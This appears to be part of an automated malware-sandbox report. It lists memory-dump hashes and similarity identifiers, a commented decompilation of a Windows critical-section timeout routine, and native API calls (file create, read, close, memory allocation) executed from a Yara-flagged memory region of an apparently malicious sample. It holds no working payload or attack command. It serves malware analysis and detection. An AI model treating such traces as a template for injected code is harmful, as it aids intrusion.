                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ca37a8d9ce894703abff8b79237e2cf5f2ef56fe19fb98bf79797be907d6beb
                                              • Instruction ID: 7ddb01155082b36ec768dc93ce1b2bfdd7dcc95939190e70a7241ec2547cd840
                                              • Opcode Fuzzy Hash: 6ca37a8d9ce894703abff8b79237e2cf5f2ef56fe19fb98bf79797be907d6beb
                                              • Instruction Fuzzy Hash: B4013171A05258AFCB44EFA9D946AAEB7F4FF48700F408059B945EB341E674DA00DB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 02884093323d8300f50ae660d6f1e4f0109dd781ee04f6b1bb01eb97dbc20e3d
                                              • Instruction ID: 32f8f4b6bd8f6d268ea3fc31189ec380c640980bd25d6a6fd5258c4a574696e3
                                              • Opcode Fuzzy Hash: 02884093323d8300f50ae660d6f1e4f0109dd781ee04f6b1bb01eb97dbc20e3d
                                              • Instruction Fuzzy Hash: 01013674D04249AFDB00EFB9D946A5EB7F4FF08300F508059B945EB341D678DA00DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d4051672c57f1e9036284ce46bea9ac90b4d713e065c2dc7ba272a8cda3d48b9
                                              • Instruction ID: 84efd0124f350e2f74eaa2673247dbc39c09f47d40d32f0e5d5bb4c6fa7ac96c
                                              • Opcode Fuzzy Hash: d4051672c57f1e9036284ce46bea9ac90b4d713e065c2dc7ba272a8cda3d48b9
                                              • Instruction Fuzzy Hash: 75F04471A04248AFDB14EFA9D906A6EB7F4AF48300F448059B945DB291D6349900DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0e21e7b8fbf4fb8684166e66e0fa117583cee163fa51e71e60c5b19e9893f1a
                                              • Instruction ID: f5c47bdce09ffeada4192a361d42189cdfb6b39a490da9a7c1fc5e291400ff94
                                              • Opcode Fuzzy Hash: b0e21e7b8fbf4fb8684166e66e0fa117583cee163fa51e71e60c5b19e9893f1a
                                              • Instruction Fuzzy Hash: 5FF0F0B3D116928ED73183148216F217BD89B08370F6C8C6FD50D83105C2A4FC80E2C0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c98363e0738771f2a590c5b83e9a968e257bde56fa060a2d08553daf4ddf1349
                                              • Instruction ID: b530e567ab4c0fb76cd057caa6a257fc8eac966b015559d83f5d78c866261252
                                              • Opcode Fuzzy Hash: c98363e0738771f2a590c5b83e9a968e257bde56fa060a2d08553daf4ddf1349
                                              • Instruction Fuzzy Hash: B3F09070E04648AFDB14EBA9D946A6E77B4AF08700F508099F906AB281EA38D9008B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce67ba1a60116c4cc8d8b81d9cad68cc929a489aa3a7413079f9f1f0811fb103
                                              • Instruction ID: e0eff70530afe81e3e85372792f3599a072dabd7c51033e5eb449bf9e73192a6
                                              • Opcode Fuzzy Hash: ce67ba1a60116c4cc8d8b81d9cad68cc929a489aa3a7413079f9f1f0811fb103
                                              • Instruction Fuzzy Hash: 6DF0A73A4151894AEFB36B6965212E67BDAFB5A150B0944C7E9E01730BC93A8893CB20
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction ID: 5a0aeb57219affe32cfc77fdd44a811516f08e87369732f49b977894dccb13d1
                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction Fuzzy Hash: 47E09B723405406BDB219E56DC85F57776DDFC2B21F05407DB5045E243C6E9DD0997A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 231fa94594f16cae34d6cc0205eae536cdf6dacebc4dba6768ba4323fd89943a
                                              • Instruction ID: f6e0ed66411fdc833d9e6aef642aed598ec76de761bedb9c0c772b7d97fd2f13
                                              • Opcode Fuzzy Hash: 231fa94594f16cae34d6cc0205eae536cdf6dacebc4dba6768ba4323fd89943a
                                              • Instruction Fuzzy Hash: 16F0B435908346EADF1AF768CA42F79BBA2AF04320F14015DE491AB161E7689C00FF85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a7cd334200990129285dc0303c423ff85d9cb19d5c2ab46c9d84d8916f4f8ca
                                              • Instruction ID: a88cfccac1c28ac96ba914f00732e416b1adf2f0d05567a13acf59c30c535e38
                                              • Opcode Fuzzy Hash: 6a7cd334200990129285dc0303c423ff85d9cb19d5c2ab46c9d84d8916f4f8ca
                                              • Instruction Fuzzy Hash: FAF08270E04249ABDB04EBA9D95AE6E77B4EF08300F50419AF956EB281EA38DD00D758
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43663605a7da216a141bd54b6e4cb517812c0e064146cbfe0d23ff6f3e24e7ca
                                              • Instruction ID: 3d338b5e36ea830ecb5b72e66bc3e2865e66613f5976faff5414edf0584cd8a8
                                              • Opcode Fuzzy Hash: 43663605a7da216a141bd54b6e4cb517812c0e064146cbfe0d23ff6f3e24e7ca
                                              • Instruction Fuzzy Hash: BAF089B0A04259ABDB10EBA9D907E7E77B4FF04700F444499BA05DB381EA78D900C798
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59db0bf2120312a6e41323ce0b3da3f1e7cfaf0e3d806fde3a2e5cfe8ba1af8a
                                              • Instruction ID: 3a4e80ebceb93d7fef3b84b70b290a093aea2e90738c74226258cebef68e731b
                                              • Opcode Fuzzy Hash: 59db0bf2120312a6e41323ce0b3da3f1e7cfaf0e3d806fde3a2e5cfe8ba1af8a
                                              • Instruction Fuzzy Hash: 3FF0B432511E848FE7B3DB1CC544B2277D8AB007B4F1495A5E58587556CB64E840C740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8fbc5a29c72ae1e98a96302537cdf817bd63e04fac45f16c7248c83304cd64c6
                                              • Instruction ID: 7349a776c22612beaa369dd1d9a7ac59b3bfa6abc57a7aefb372807bf1d5c5a3
                                              • Opcode Fuzzy Hash: 8fbc5a29c72ae1e98a96302537cdf817bd63e04fac45f16c7248c83304cd64c6
                                              • Instruction Fuzzy Hash: 3E90027120140802D2006159480875710069BD0342F52C021A6155556F86A5C891B571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c9fa141b3a33d0fb8ce0d1b2b890af9b214ad067e2e8b5b9a468fd5f8b959d6
                                              • Instruction ID: 316b031c3682785855358430d43b0f1f29ed78af82e8e0b02afceebae445912e
                                              • Opcode Fuzzy Hash: 4c9fa141b3a33d0fb8ce0d1b2b890af9b214ad067e2e8b5b9a468fd5f8b959d6
                                              • Instruction Fuzzy Hash: 5B90027120144402D2407159844461B6006ABE0341F52C421E1416555D86558856F261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e9a61bf8cc58479cfbc196597c73f45dc754060f251af94ea748c800b238bf5
                                              • Instruction ID: f288d7779d86f6b9262f2b7865686aaeb05bc6c34e0d1ede1a5baff4f3a7168d
                                              • Opcode Fuzzy Hash: 0e9a61bf8cc58479cfbc196597c73f45dc754060f251af94ea748c800b238bf5
                                              • Instruction Fuzzy Hash: B590026120504842D20065595408A1610069BD0345F52D021A2055596EC6758851F171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9012a7ee680d6c36c6a2094ce1f673a62d39bee25627165037fc909aa152c14f
                                              • Instruction ID: a5d8e1ddc7c4f72d48d00024feadd4651c5ef350415dfed20b1eae1d7e922f49
                                              • Opcode Fuzzy Hash: 9012a7ee680d6c36c6a2094ce1f673a62d39bee25627165037fc909aa152c14f
                                              • Instruction Fuzzy Hash: CD90027520504842D60065595804A9710069BD0345F52D421A141559DE86948861F161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: afa2aa6cbc433ee161770eea28a5a233043b17648adff360740d288d04a87c2b
                                              • Instruction ID: 0401a687bfb9e21138f73e7eeb5457160b128572ac9bb4257cea05583823edd2
                                              • Opcode Fuzzy Hash: afa2aa6cbc433ee161770eea28a5a233043b17648adff360740d288d04a87c2b
                                              • Instruction Fuzzy Hash: D490027120100803D2006159550871710069BD0341F52D421A1415559ED6968851B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed16354f90103bcdc16d6f94d58d035164b360c38d3d6d847ffef0282aae3764
                                              • Instruction ID: 5e72a04e4769699c2707708c02f1d5b0b2c072100efbe9989910579fd59c7c75
                                              • Opcode Fuzzy Hash: ed16354f90103bcdc16d6f94d58d035164b360c38d3d6d847ffef0282aae3764
                                              • Instruction Fuzzy Hash: 0A90026160500802D2407159541871610169BD0341F52D021A1015555EC6998A55B6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aca83e95980e3e600fcdcc49931fa77f52fbf22aa53f5aa05e5a7be9f4f47b73
                                              • Instruction ID: d5bd825d9b47240702db2574ceb2672e975a64ff5070821716da03e5d360eaa3
                                              • Opcode Fuzzy Hash: aca83e95980e3e600fcdcc49931fa77f52fbf22aa53f5aa05e5a7be9f4f47b73
                                              • Instruction Fuzzy Hash: D8900271301004529600A6995804A5A51069BF0341B52D025A5005555D85948861B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9122c4c4f962a7250b01021b963fe1a105b0331d4b8286f2d0f630ca0975e523
                                              • Instruction ID: 442a69b6cf0d632e566933417f19f4fd0b3cd30334433875a4f84e92ef26e93d
                                              • Opcode Fuzzy Hash: 9122c4c4f962a7250b01021b963fe1a105b0331d4b8286f2d0f630ca0975e523
                                              • Instruction Fuzzy Hash: 6590026124100C02D240715984147171007DBD0741F52C021A1015555E86568965B6F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: baa0556110511710561c96ac1e9ce9ed5320d444bae1012285f46e5151337cb3
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 53%
                                              			/* Decompiler output from the sandbox (unchanged); comments added for orientation.
                                              			 * The two format strings identify this as ntdll's critical-section wait diagnostic
                                              			 * path: it waits on the section with a one-second relative timeout and, on timeout,
                                              			 * prints owner/contention details via the RTL debug print routine (E01035720). */
                                              			E0103FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];                       /* TEB self-pointer (32-bit Windows) */
                                              				_t15 = _t12;                              /* RTL_CRITICAL_SECTION being entered */
                                              				/* 0xffffffffff676980 = -10,000,000 x 100ns: a one-second relative timeout */
                                              				_t7 = E00FECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E01035720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;                             /* CriticalSection->DebugInfo */
                                              				if(_t9 == 0xffffffff) {                   /* no debug info attached */
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));  /* DebugInfo->ContentionCount */
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));       /* CriticalSection->OwningThread */
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));      /* TEB->ClientId.UniqueThread */
                                              				/* TEB+0x20 is ClientId.UniqueProcess, the "Pid" in the format string */
                                              				return E01035720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0103FDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0103FE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0103FE01
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 5eba94f90e07cb0e5d1e4202600a08f6f6d0fe37931a17c35664057ca8cf2292
                                              • Instruction ID: 4ba9bd8734d97cc55d6d953e291a40347b041a8e98cc385aa41500da1d72e27a
                                              • Opcode Fuzzy Hash: 5eba94f90e07cb0e5d1e4202600a08f6f6d0fe37931a17c35664057ca8cf2292
                                              • Instruction Fuzzy Hash: 9CF0F632640202BFEA211A49DC02F63BF5EEB84B30F140314F668561E1DA62F82096F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00163BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00163BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0016863D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                              • Instruction ID: 7a48cb8db58065d89ea092e4ca246d730f8ed2668f2b063519b42218ed97c2e2
                                              • Opcode Fuzzy Hash: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                              • Instruction Fuzzy Hash: 6201AFB2245108AFCB08CF98DC95EEB77A9AF9C354F158248FA1D97241D630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00163BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00163BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0016863D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: 9f7b0c1446f337d324f06736a25229e6f12aedc5ad3d4110de591d7b79788410
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: F6F0BDB2200208ABCB08CF88DC85EEB77EDAF8C754F158248BA0D97241C630E811CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(00163D60,?,?,00163D60,00000000,FFFFFFFF), ref: 00168745
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                              • Instruction ID: 6df237cb702c6fbb00068729910f96304784c88c3ba45fb0d627b2ee558f2ddf
                                              • Opcode Fuzzy Hash: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                              • Instruction Fuzzy Hash: 1C015E76200208AFDB14DF98CC85EEB77ADEF89310F118558BE0C97242C630E910CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(00163D82,5E972F65,FFFFFFFF,00163A41,?,?,00163D82,?,00163A41,FFFFFFFF,5E972F65,00163D82,?,00000000), ref: 001686E5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: a8d2c0eef6077805fd3a2d456351f035955919c385051368adaad75faf922292
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: 85F0A4B2200208ABCB14DF8DDC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00152D11,00002000,00003000,00000004), ref: 00168809
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                              • Instruction ID: 10db05d09df6306e14209306b27a026745874efe553780850df6654fd3d860d3
                                              • Opcode Fuzzy Hash: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                              • Instruction Fuzzy Hash: 59F015B6210159AFDB18DF88CC85EAB77ADFF89354F118589FE5A97241C630E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00152D11,00002000,00003000,00000004), ref: 00168809
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: a9aaf8c2684a50135704907fe68aa80d412a49c82eaa100644afe9b5bb3c4abc
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: E3F015B2200208ABCB14DF89CC81EAB77ADAF88750F118148BE0897241C630F810CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(00163D60,?,?,00163D60,00000000,FFFFFFFF), ref: 00168745
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: b88fafdb867a33fcee9b14bbe209ca13f46b28f4b29ac406ffea59cf908ec830
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: C5D01776200218ABD710EB98CC89EA77BACEF48760F154499BA189B242C630FA1086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
                                              • Instruction ID: 356edf8a4880885a38f981b1f7cb51325498aa8af4b22352ec53afeccdb78dc1
                                              • Opcode Fuzzy Hash: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
                                              • Instruction Fuzzy Hash: 6590027124100417F12171598504B07000997E4285F91C426E041556CD9696D956B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
                                              • Instruction ID: e9182d5674df18e909ebbbe354946ca3a1ddf629a08fb0611876639156d16006
                                              • Opcode Fuzzy Hash: 052c9d9e48669c52b1db094dca336106c5b2d81c5fe9bf00dda5ad79a2cc27b5
                                              • Instruction Fuzzy Hash: E8900271282041567555B15984049074006A7F4285791C026E1405964C8566E85AF661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
                                              • Instruction ID: 014803386cd8810602c251efe0935cf1a4baac3dcc5d38263e231dc1db4d369a
                                              • Opcode Fuzzy Hash: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
                                              • Instruction Fuzzy Hash: AC900275251000072115B5594704907004697E9395351C035F1006564CD661D8657161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
